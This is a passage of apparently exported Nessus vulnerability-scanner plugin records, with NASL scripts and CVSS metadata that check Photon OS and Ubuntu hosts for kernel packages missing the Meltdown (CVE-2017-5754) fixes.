The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121797);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\"CVE-2017-5754\");\n\n script_name(english:\"Photon OS 1.0: Linux PHSA-2018-1.0-0097\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the linux package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-97.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5754\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-4.4.110-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-debuginfo-4.4.110-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-dev-4.4.110-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-docs-4.4.110-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-drivers-gpu-4.4.110-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-4.4.110-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-debuginfo-4.4.110-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-devel-4.4.110-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-docs-4.4.110-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", 
reference:\"linux-oprofile-4.4.110-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-sound-4.4.110-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-tools-4.4.110-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-30T14:55:11", "description": "An update of the linux package has been released.", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2019-02-07T00:00:00", "type": "nessus", "title": "Photon OS 2.0: Linux PHSA-2018-2.0-0010", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2019-04-02T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:linux", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2018-2_0-0010_LINUX.NASL", "href": "https://www.tenable.com/plugins/nessus/121906", "sourceData": "#\n# (C) Tenable Network 
Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-2.0-0010. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121906);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\"CVE-2017-5754\");\n\n script_name(english:\"Photon OS 2.0: Linux PHSA-2018-2.0-0010\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the linux package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-10.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5754\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-debuginfo-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-devel-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-docs-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-drivers-gpu-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-debuginfo-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-devel-4.9.75-1.ph2\")) flag++;\nif 
(rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-docs-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-oprofile-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-debuginfo-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-devel-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-docs-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-lkcm-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-sound-4.9.75-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-tools-4.9.75-1.ph2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-30T14:42:52", "description": "USN-3522-1 fixed a vulnerability in the Linux kernel to address Meltdown (CVE-2017-5754). Unfortunately, that update introduced a regression where a few systems failed to boot successfully. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nJann Horn discovered that microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized memory reads via sidechannel attacks. This flaw is known as Meltdown. A local attacker could use this to expose sensitive information, including kernel memory.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-11T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS : linux regression (USN-3522-3) (Meltdown)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "UBUNTU_USN-3522-3.NASL", "href": "https://www.tenable.com/plugins/nessus/105745", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3522-3. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105745);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2017-5754\");\n script_xref(name:\"USN\", value:\"3522-3\");\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux regression (USN-3522-3) (Meltdown)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"USN-3522-1 fixed a vulnerability in the Linux kernel to address\nMeltdown (CVE-2017-5754). Unfortunately, that update introduced a\nregression where a few systems failed to boot successfully. This\nupdate fixes the problem.\n\nWe apologize for the inconvenience.\n\nJann Horn discovered that microprocessors utilizing speculative\nexecution and indirect branch prediction may allow unauthorized memory\nreads via sidechannel attacks. This flaw is known as Meltdown. A local\nattacker could use this to expose sensitive information, including\nkernel memory.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3522-3/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu 
Security Notice (C) 2018-2023 Canonical, Inc. / NASL script (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-5754\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3522-3\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-109-generic\", pkgver:\"4.4.0-109.132\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-109-lowlatency\", pkgver:\"4.4.0-109.132\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic\", pkgver:\"4.4.0.109.114\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.4.0.109.114\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : 
ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-generic / linux-image-4.4-lowlatency / etc\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-30T14:42:00", "description": "USN-3522-2 fixed a vulnerability in the Linux Hardware Enablement kernel for Ubuntu 14.04 LTS to address Meltdown (CVE-2017-5754).\nUnfortunately, that update introduced a regression where a few systems failed to boot successfully. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nJann Horn discovered that microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized memory reads via sidechannel attacks. This flaw is known as Meltdown. A local attacker could use this to expose sensitive information, including kernel memory.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-11T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : linux-lts-xenial regression (USN-3522-4) (Meltdown)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-xenial", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-lts-xenial", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3522-4.NASL", "href": "https://www.tenable.com/plugins/nessus/105746", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3522-4. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105746);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2017-5754\");\n script_xref(name:\"USN\", value:\"3522-4\");\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-xenial regression (USN-3522-4) (Meltdown)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"USN-3522-2 fixed a vulnerability in the Linux Hardware Enablement\nkernel for Ubuntu 14.04 LTS to address Meltdown (CVE-2017-5754).\nUnfortunately, that update introduced a regression where a few systems\nfailed to boot successfully. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nJann Horn discovered that microprocessors utilizing speculative\nexecution and indirect branch prediction may allow unauthorized memory\nreads via sidechannel attacks. This flaw is known as Meltdown. A local\nattacker could use this to expose sensitive information, including\nkernel memory.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3522-4/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"Ubuntu Security Notice (C) 2018-2023 Canonical, Inc. / NASL script (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-5754\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3522-4\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-109-generic\", pkgver:\"4.4.0-109.132~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-109-lowlatency\", pkgver:\"4.4.0-109.132~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic-lts-xenial\", pkgver:\"4.4.0.109.92\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-lowlatency-lts-xenial\", pkgver:\"4.4.0.109.92\")) flag++;\n\nif (flag)\n{\n 
